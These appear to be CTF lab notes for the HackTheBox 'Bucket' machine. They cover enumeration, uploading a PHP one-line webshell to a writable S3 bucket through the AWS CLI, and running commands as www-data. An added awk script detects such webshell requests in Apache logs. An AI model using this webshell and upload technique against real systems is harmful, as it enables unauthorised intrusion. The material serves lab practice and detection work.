3 :80 s3.bucket.htb
http://s3.bucket.htb/ | http://s3.bucket.htb/adserver/
{"status": "running"}
http://s3.bucket.htb/adserver/index.html
Returns the same page as http://bucket.htb/
$ gobuster dir -u http://s3.bucket.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 80
===============================================================
/health (Status: 200) [Size: 54]
/shell (Status: 200) [Size: 0]
/shell.php (Status: 500) [Size: 158]
/shell.html (Status: 500) [Size: 158]
/shell.txt (Status: 500) [Size: 158]
http://s3.bucket.htb/health
{
"services": {
"s3": "running",
"dynamodb": "running"
}
}
http://s3.bucket.htb/shell/
DynamoDB JavaScript Shell
$ sudo apt install awscli
Using https://docs.aws.amazon.com/cli/latest/userguide/cli-services-s3-commands.html
$ aws s3 --endpoint-url http://s3.bucket.htb ls
2021-11-12 16:05:03 adserve
$ aws s3 --endpoint-url http://s3.bucket.htb ls s3://adserver
PRE images/
2021-11-12 16:09:04 5344 index.html
$ aws s3 --endpoint-url http://s3.bucket.htb ls s3://adserver/images/
2021-11-12 16:09:04 37840 bug.jpg
2021-11-12 16:09:04 51485 cloud.png
2021-11-12 16:09:04 16486 malware.png
# nothing here, trying to write data to s3
$ echo "kashz" > kashz.txt
$ aws s3 --endpoint-url http://s3.bucket.htb cp kashz.txt s3://adserver/kashz.txt
upload: ./kashz.txt to s3://adserver/kashz.txt
$ aws s3 --endpoint-url http://s3.bucket.htb ls s3://adserver/
PRE images/
2021-11-12 16:09:04 5344 index.html
2021-11-12 16:10:26 6 kashz.txt
# text file is uploaded but not visible at http://bucket.htb/kashz.txt
# testing .html
$ aws s3 --endpoint-url http://s3.bucket.htb cp kashz.html s3://adserver/kashz.html
upload: ./kashz.html to s3://adserver/kashz.html
$ curl http://bucket.htb/kashz.html
kashz
# wolf's web.php didn't work but simple webshell works
$ cat k.php
<?php echo system($_GET["cmd"]); ?>
$ aws s3 --endpoint-url http://s3.bucket.htb cp k.php s3://adserver/
upload: ./k.php to s3://adserver/k.php
# for some reason, this was the response
$ curl http://bucket.htb/k.php
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at bucket.htb Port 80</address>
</body></html>
$ curl http://bucket.htb/k.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
# shell gets deleted; downloading msfvenom shell, chmod 777 and executing.
$ curl http://bucket.htb/k.php -G --data-urlencode "cmd=whoami;id;hostname;uname -a"
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bucket
Linux bucket 5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
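Added example, not part of the original notes: a detection for the request pattern above, where a script path first returns 404 and later returns 200 with a query string, run over Apache access-log lines. The log lines, client addresses and function names are constructed for the example, and Apache combined log format is assumed.

```shell
#!/usr/bin/env bash
# Added example: flag script paths that first return 404, then 200 with a query string.
# Assumes Apache combined log format ($7 = request target, $9 = status code).

# Constructed sample log lines; addresses, times and sizes are made up.
sample_log() {
  cat <<'EOF'
10.10.14.7 - - [12/Nov/2021:16:12:01 +0000] "GET /index.html HTTP/1.1" 200 5344 "-" "curl/7.74.0"
10.10.14.7 - - [12/Nov/2021:16:12:30 +0000] "GET /k.php HTTP/1.1" 404 274 "-" "curl/7.74.0"
10.10.14.7 - - [12/Nov/2021:16:12:55 +0000] "GET /k.php?cmd=id HTTP/1.1" 200 54 "-" "curl/7.74.0"
10.10.14.7 - - [12/Nov/2021:16:13:20 +0000] "GET /k.php?cmd=whoami%3Bid%3Bhostname HTTP/1.1" 200 120 "-" "curl/7.74.0"
10.10.14.9 - - [12/Nov/2021:16:14:00 +0000] "GET /images/bug.jpg HTTP/1.1" 200 37840 "-" "Mozilla/5.0"
10.10.14.9 - - [12/Nov/2021:16:14:05 +0000] "GET /missing.html HTTP/1.1" 404 274 "-" "Mozilla/5.0"
EOF
}

# Print "path first_client hit_count" for each suspicious script path on stdin.
flag_new_scripts() {
  awk '
    {
      target = $7; status = $9; path = target; query = ""
      q = index(target, "?")
      if (q > 0) { path = substr(target, 1, q - 1); query = substr(target, q + 1) }
      # Only server-executed script extensions are of interest here.
      if (path !~ /\.(php|phtml|phar)$/) next
      # A 404 on a script path records that it did not exist yet.
      if (status == 404) { missing[path] = 1; next }
      # The same path later answering 200 with parameters is the signal.
      if (status == 200 && (path in missing) && query != "") {
        if (!(path in hits)) { first[path] = $1; order[++n] = path }
        hits[path]++
      }
    }
    END { for (i = 1; i <= n; i++) print order[i], first[order[i]], hits[order[i]] }
  '
}

sample_log | flag_new_scripts   # prints: /k.php 10.10.14.7 2
```

This version ignores timestamps, so on real logs the gap between the 404 and the 200 should be bounded to a short window to avoid matching scripts deployed legitimately.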